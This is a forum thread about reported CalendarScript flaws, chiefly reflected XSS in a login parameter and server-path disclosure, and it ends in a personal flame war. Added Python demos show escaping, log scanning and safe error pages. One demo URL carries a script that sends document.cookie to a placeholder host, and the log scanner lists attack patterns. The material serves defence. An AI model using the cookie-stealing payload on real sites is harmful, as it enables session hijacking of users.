I just saw that the latest version is 3.21, released 2003.
So I just googled for CalendarScript, wanted to see what others have to say. Found a SecurityTracker comment on 3.21: http://securitytracker.com/alerts/2005/Apr/1013705.html
Anyone know a thing about it?
Greetz,
Matze
JMO
Dan O. (Not CalendarScript's author)
------------------
Thanks for the reply.
I will ask Matt directly.
But it is not only showing of the path or something.
Also in version 3.21, the 'username' parameter is not filtered to remove HTML code. A demonstration exploit URL is provided:
/cgi-bin/calendar/calendar.pl?calendar=[valid calendar]&command=login&username=[XSS]&template=login.htm
matze
PS: I looked everywhere and I did not find the mail address of Matt. Could someone tell me this info?
[This message has been edited by matze.schrader (edited June 10, 2006).]
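Added illustration of the advisory quoted above (it is not CalendarScript's own Perl code and not from anyone in this thread): a reflected parameter that is spliced into a login template unchanged lets a crafted URL put a script tag into the page, while HTML-escaping the value before it is interpolated turns the same payload into inert text. The template string, the evil.example host and the parameter parsing are assumptions for the demo; the payload targets document.cookie, which is the cookie access the thread goes on to discuss.

```python
# Added demo (not CalendarScript code): reflected 'username' -> HTML, unfiltered vs escaped.
import html
from urllib.parse import parse_qs, urlsplit

# Assumed login template: the script echoes the submitted username back into the form.
LOGIN_TEMPLATE = (
    '<form method="post" action="calendar.pl">'
    '<input name="username" value="{username}">'
    '</form>'
)

# Constructed request in the shape the advisory quotes; evil.example is a placeholder host.
DEMO_URL = (
    "/cgi-bin/calendar/calendar.pl?calendar=default&command=login"
    '&username="><script>document.location="http://evil.example/?c="%2Bdocument.cookie</script>'
    "&template=login.htm"
)


def username_from_url(url: str) -> str:
    """Return the URL-decoded 'username' query parameter, as a CGI script would see it."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get("username", [""])[0]


def render_unfiltered(username: str) -> str:
    """Vulnerable: the raw value is spliced into the attribute, so '">' closes it."""
    return LOGIN_TEMPLATE.format(username=username)


def render_escaped(username: str) -> str:
    """Hardened: escape &, <, >, " and ' before interpolation; the value stays text."""
    return LOGIN_TEMPLATE.format(username=html.escape(username, quote=True))


def contains_active_markup(page: str) -> bool:
    """Crude demo check: did a <script> tag survive into the output?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    u = username_from_url(DEMO_URL)
    print("unfiltered:", render_unfiltered(u))
    print("escaped:   ", render_escaped(u))
```

The escaped rendering still shows the user what they typed, so nothing is lost for legitimate logins; only the ability to break out of the attribute goes away.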
As I said, "I don't know about all that site's accusations...".
** the 'username' parameter is not filtered to remove HTML code. **
Which accomplishes what exactly in the way of a security risk???
They do mention about gaining access to browser cookies but if the site's cookies are formatted correctly, an exploit will only be able to access the CalendarScript cookie which IMO is pretty benign.
The biggest security risk with any CGI script is usually when they allow or can be hacked to allow users to upload and execute new CGI scripts on the server. AFAIK, such possibilities have been removed from the current CalendarScript version.
JMO - As I said, ask Matt what he thinks.
PS. You might want to provide a link to this message if you email Matt so he can also reply publicly.
Dan O.
Remember, what's reported is usually the tip of the iceberg,
and the installation path is "important". It is nobody's business and will lay the foundation for other paths for all scripts in the cgi-bin. It can also display paths to plugins even if you change their default names. Should you ever come across a malicious author, he's in your website 1-2-3. Would you go to sleep with your front door wide open?
The good thing is logs capture everything. Do a search in them at least weekly, checking calls to your scripts; you'll be amazed what you'll find sometimes.
You could also write a shell script to retrieve all particular calls, or exclude known good ones, to let's say this calendar program, to check daily and email results to you to look over maybe during breakfast.
also see my other link http://www.calendarscript.com/support/forum/Forum2/HTML/000974.html
Be safe, or at least make an effort.
Sonny
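An added example of the daily log review described in the post above (not from the thread or from CalendarScript itself), written in Python rather than shell so the filtering is easy to read. It runs over constructed Apache "combined" access-log lines, keeps only requests to the calendar script and the shipped debug script, drops plain successful calendar views whose parameters are all alphanumeric, and flags HTML markup or path traversal in the query, non-200 responses, and any fetch of the debug script. The IPs, hostnames and the debug.pl file name are assumptions.

```python
# Added example (not CalendarScript code): review access-log calls to calendar.pl.
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample lines in Apache combined format; addresses and names are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jun/2006:08:01:02 +0000] "GET /cgi-bin/calendar/calendar.pl?calendar=default&year=2006 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Jun/2006:08:01:09 +0000] "GET /index.html HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jun/2006:08:02:41 +0000] "GET /cgi-bin/calendar/calendar.pl?calendar=default&command=login&username=%3Cscript%3Ealert(1)%3C/script%3E&template=login.htm HTTP/1.1" 200 4410 "-" "curl/7.15"
198.51.100.7 - - [10/Jun/2006:08:02:55 +0000] "GET /cgi-bin/calendar/debug.pl HTTP/1.1" 200 2210 "-" "curl/7.15"
198.51.100.7 - - [10/Jun/2006:08:03:10 +0000] "GET /cgi-bin/calendar/calendar.pl?calendar=../../etc/passwd%00 HTTP/1.1" 500 1503 "-" "curl/7.15"
192.0.2.9 - - [10/Jun/2006:08:05:00 +0000] "GET /cgi-bin/calendar/calendar.pl?calendar=default&year=f00b4r HTTP/1.1" 500 3902 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Requests we care about: the calendar script and the debug script that ships beside it.
SCRIPTS = ("/cgi-bin/calendar/calendar.pl", "/cgi-bin/calendar/debug.pl")

# Known-good: every parameter value is short and alphanumeric (a normal calendar view).
SAFE_PARAM = re.compile(r"^[A-Za-z0-9_-]{1,32}$")

# Things that never belong in a calendar query string.
BAD_PATTERNS = {
    "html_markup": re.compile(r"[<>]|javascript:", re.I),
    "path_traversal": re.compile(r"\.\./|%00|\x00"),
}


def classify(line: str):
    """Return (ip, request path, reason) for a line worth a human look, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["path"])
    if parts.path not in SCRIPTS:
        return None
    if parts.path.endswith("debug.pl"):
        return (m["ip"], m["path"], "debug script fetched")
    decoded = unquote_plus(parts.query)          # look at what the script actually saw
    for name, rx in BAD_PATTERNS.items():
        if rx.search(decoded):
            return (m["ip"], m["path"], name)
    if m["status"] != "200":                    # errors expose the debug printout
        return (m["ip"], m["path"], f"status {m['status']}")
    params = parse_qs(parts.query, keep_blank_values=True)
    if all(SAFE_PARAM.match(v) for vs in params.values() for v in vs):
        return None                              # known-good view, exclude it
    return (m["ip"], m["path"], "unusual parameter value")


def review(log_text: str):
    """Classify every line; return the flagged hits in log order."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for ip, path, reason in review(SAMPLE_LOG):
        print(f"{ip:15} {reason:22} {path}")
```

Run it from cron against the previous day's log and pipe the output to mail; an empty report is the normal case, and the four hits above (markup in username, the debug script being fetched, a traversal attempt, and a request that produced a 500) are the kind of thing the post says you will find.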
Just knowing the server path does not allow users to access that area nor any other part of the server. I would hope that most users would have their web site secured properly but if not, that is their problem, not CalendarScript's.
Upon error, why not simply just display a "this script experienced an error" message instead of a detailed debug printout for every Tom, Dick and Harry to see! I thought that was why there's a debug script included. You say just have a secured server and that will make things fine; the last version of CalendarScript did create a way in, making one's server insecure all by itself.
Take a look: http://www.calendarscript.com/demo/calendar.pl?calendar=default&year=f00b4r
I see you do not even run a public CalendarScript on your site, and if you did I'm sure it wouldn't display a thing about "paths".
There is a debug script that comes in the zip already. Many out there, I bet, don't even rename that debug script or protect it from being run; anybody familiar with CalendarScript knows it's in the same folder as calendar.pl. Also, you did not mention why the password required was off by default. Makes no sense; why not just enable it, or at least mention it somewhere in the docs, since there's no way to enable it via the admin panel?
Scott, none of these things are major by "itself", but they add up and begin to make one think: if simple things like this go unnoticed or unfixed, what else in there needs checking, "justified or NOT"? I know this thing's been idle for years, but someone should at least start mentioning this stuff. A lot of people keep important stuff in their folders along with this script that are not programmers and could not even imagine what could happen one day. Until, that is, the day it does.
This is a great looking, easy to manage calendar that took brilliant foresight and tremendous talent to make happen. Don't give up on this program; fix a few things when you get a chance one day.
Thanks
Sonny
BTW. The debug script that ships with the program only checks file locations and permissions.
I for one would prefer a detailed error message to be displayed so I can find the cause of problems when they occur.
JFYI
Dan O.
--------------------------------------------
Any script I have ever used had a log for script errors, not a public printout like CalendarScript does.
OK, fair enough, I know you just try to help out on the forum once in a while.
Do you, or does someone out there, know a way to kill that printout from happening, and just leave a blank screen or text message or something other than my server info?
Thanks
Sonny
PS: Having the script also write the error to something like errors.txt would be great.
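Added example of the error-handling shape asked for in the post above (it is not CalendarScript's code, which is Perl, and nobody in the thread wrote it): the full traceback is appended to a private errors.txt together with a short reference id, and the browser only ever gets a generic notice carrying that id, never file paths, variable dumps or interpreter internals. The handler name, the `records` parameter used to capture the record in memory, and the page layout are assumptions; the bad-year input is the demo URL quoted earlier in the thread.

```python
# Added example (not CalendarScript code): generic error page plus a private errors.txt.
import sys
import time
import traceback
import uuid

GENERIC_MESSAGE = "This script experienced an error. Please notify the site administrator."


def log_detailed_error(exc: BaseException, records=None, path: str = "errors.txt") -> str:
    """Record the full traceback privately and return the reference id shown to the user.

    records: an optional list that receives the record instead of the file (assumption
    made for this demo so it can run without touching the filesystem).
    """
    ref = uuid.uuid4().hex[:8]
    record = (
        f"--- {time.strftime('%Y-%m-%d %H:%M:%S')} ref={ref}\n"
        + "".join(traceback.format_exception(type(exc), exc, exc.__traceback__))
    )
    if records is not None:
        records.append(record)
    else:
        with open(path, "a", encoding="utf-8") as fh:   # keep this file outside the web root
            fh.write(record)
    return ref


def render_error_page(ref: str) -> str:
    """What the browser sees: a fixed message and an id the admin can grep for."""
    return (
        "Content-Type: text/html\n\n"
        "<html><body>"
        f"<p>{GENERIC_MESSAGE}</p>"
        f"<p>Reference: {ref}</p>"
        "</body></html>"
    )


def handle_request(year_param: str, records=None) -> str:
    """Stand-in for the script's main routine: bad input raises, the handler hides details."""
    try:
        year = int(year_param)                    # 'year=f00b4r' fails here
        return "Content-Type: text/html\n\n" + f"<html><body>Calendar for {year}</body></html>"
    except Exception as exc:                      # catch-all so nothing leaks past us
        ref = log_detailed_error(exc, records=records)
        return render_error_page(ref)


if __name__ == "__main__":
    private = []
    sys.stdout.write(handle_request("f00b4r", records=private))   # what the browser gets
    sys.stderr.write(private[0])                                  # what stays in the log
```

The point of the reference id is that the admin can still match a user's complaint to the exact traceback without any of that traceback being public.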
I'm sure the script author would, I don't offhand without looking through the whole script for the routine responsible. Maybe you could have a peek?
** Any script I have ever used had a log for script errors **
Really?? all, ALL the other shareware scripts I've been involved with just rely on Perl to report errors to the server error log. I've never come across one that even tried to report (let alone record) errors itself. CalendarScript is a step above those IMO.
** I know you just try to help out on the forum once and awhile. **
Yes. I usually just drop by several times a day to check for new postings... except when I'm on holidays like last week.
If I knew, why would I be asking?
** Really?? all, ALL the other shareware scripts I've been involved with just rely on Perl to report errors to the server error log. I've never come across one that even tried to report (let alone record) errors itself. CalendarScript is a step above those IMO.**
Yes really, you're being disingenuous if you spew that line that most free scripts don't have an error log. Just off my head, here's one; download the zip and see for YOURSELF: http://checkwebsite.org/website-monitoring-terms.php
Look for this line in the ReadMe: "my $error_log = 'Responser_errors.txt'". THAT IS AN ERROR LOG FOR SCRIPT ERRORS.
Personally I would never open CalendarScript to the public the way it is now; I would be compromising everything on my server. Google CalendarScript. The sad part is most using this script are not high-tech programmers or security savvy people (me included). If that last security warning never got published all over the place, this script would still have that MAJOR exploit.
I would bet you alone know about a dozen ways to exploit this script, not to mention your plugins. Based on the way you defend security holes as being in our interest, combined with the fact you know scripting and know what you are saying is untrue, leads me to believe you're nothing but a WOLF in SHEEP'S clothing and you probably do not want those fixes.
ONE LAST THING in closing (let me be REALLY clear): you're not here out of the generosity of your heart, my friend; you're here to cash in on what's left relating to fixes, installs, and plugging your outdated, link-infested URL. Anybody need proof? Look no further than his own post: he links to his URL (ads and click credits); you then need to scroll and search for a link that leads back to this forum again anyway.
IF I WAS THE AUTHOR OF THIS CALENDAR SCRIPT I WOULD DEMAND A CUT OF THE ACTION. BUT I know you no make nottin, nadda, goose egg, zip, right? OOOOK
The biggest BS I ever heard online was when you replied to a person wanting to hire you and you replied "see my site for a contact link, but it may take me a week to respond, I never check my email that often". BE REAL. It's the only reason you're here in the first place.
In disgust
Sonny
I never said you knew anything (I would hate to presume). I suggested you look yourself to see if you can find it.
** your being disingenous if you spew that line most free scripts don't have an error log. **
Did I say that? Noooo! I said, "ALL the other shareware scripts I've been involved with just rely on Perl to report errors to the server error log". I'm sure there are some out there that do do it, but that is not the 'norm' (IMO and from my experience) for shareware scripts.
** need proof look no further then his own post, he links to his url, (adds and click credits) you then need to scroll and search for a link that leads back to this forum again anyway. **
Did you happen to look at the top of these support forums:
quote:Looking for plugins, mods, templates, and other cool ways to customize CalendarScript and extend its functionality? Check out the Unofficial CalendarScript Mods and Plug-Ins page at much2.com for some absolutely excellent additions to the script!
** your out dated link infested url... he links to his url, (adds and click credits) **
I am not responsible for other people's contributions. If you aren't happy with it/them why don't you do something constructive and fix them rather than just complaining someone bothered to even maintain them at all. BTW. On the plug-in's page there are 4 (count'em 4) banner ads and no "click credit" links (if such a thing even exists anymore on the internet).
** you then need to scroll and search for a link that leads back to this forum again anyway. **
quote: from the Unofficial CalendarScript Mods and Plug-Ins site (at the very TOP):
Last Updated On: 28-Apr-2006 - 13:01:03
This site is a repository of plugins, templates, hacks and links to enhancements for Scott's excellent LINK>CalendarScript< CGI script. Much of it contains the work of David Whittaker (aka TubaDave - whom also started this repository) and Kent but also some by myself (Dan O.) and others whom are proud of their CS implementation and want to share so others can benefit too. For any support questions, please post in the LINK>CalendarScript support forum< .
You seem to have a chip on your shoulder and by the looks of it, it's just getting bigger. Quit while you're behind (or "a behind" - your choice).
Dan O. (not CalendarScript's author)
You were just being a wise guy.
------------------------------------------------
"Did you happen to look at the top of these support forums? That was put there by CalendarScript's author himself, JFYI."
This author has long since given up on this script and knows to properly make it safe would take a complete rewrite. What's your point? He gave you free rein to plug your garbage site and see what's left to be had exploiting fixes, plugins and other puke, which I'm sure you became good at.
------------------------------------------------
"I'm sure that are some out there that do do it"
That's not what you spewed before I posted proof above. I know more scripts that do than don't, but that doesn't fit with your "CalendarScript went the extra mile and is safe" routine you use to keep pushing this exploitable script. It ain't on your public site, right?
------------------------------------------------
"Last Updated On: 28-Apr-2006 - 13:01:03"
Funny how one gets moving once exposed. I'm glad some good came out of our conversations for those who want to play spin the bottle with their website. Want to push this thing right, really start a clean slate, make it somewhat safe? You know how; you can keep your back doors, just make it hard on the majority at least out there.
------------------------------------------------
"You seen to have a chip on your shoulder and by the looks of it, it's just getting bigger. Quit while you're behind (or "a behind" - your choice)."
You're not only a bottom feeder living off an exploitable script, you're corny as well.
------------------------------------------------
In total disgust
Sonny
quote: "I never said you knew anything (I would hate to presume)." You were just being a wise guy
BTW. If you're of legal age (I have my doubts), you better watch the accusations you make against other people or you may find yourself being sued one day by someone not as tolerant as I. I simply credit the source (as I'm sure anyone else reading your rantings will).
quote: "Last Updated On: 28-Apr-2006 - 13:01:03" Funny how one gets moving once exposed
Today (where I am anyway) is August 3, 2006
With the misinterpretations you keep making, I don't know how much stock anyone would put in your statements. Need anyone say more?
Good luck (and hopefully good bye)!
THIS SCRIPT IS very risky to use. I SEE THERE IS NO LICENSE INCLUDED INSIDE THE ZIP or anywhere else I could find on the site as of this post. DO YOU FIND THAT ODD? DOES ANYBODY FIND THAT ODD?
COULD IT BE BECAUSE A DISCLAIMER IS NOT 100% protection from liability IF YOU KNOWINGLY DISTRIBUTE and do not inform? You have it backwards; you better watch yourself legally.
You never mentioned why you do not run CalendarScript publicly. I asked you before, and I am asking you again. All I read and see from you are links and the "I'm available for installs" and such rhetoric lines, so go ahead and both show and reassure us how comfortable you are running this script publicly on your website. People are not stupid; they know what I'm saying. I am trying to watch out for them.
In total disgust and amazement
Sonny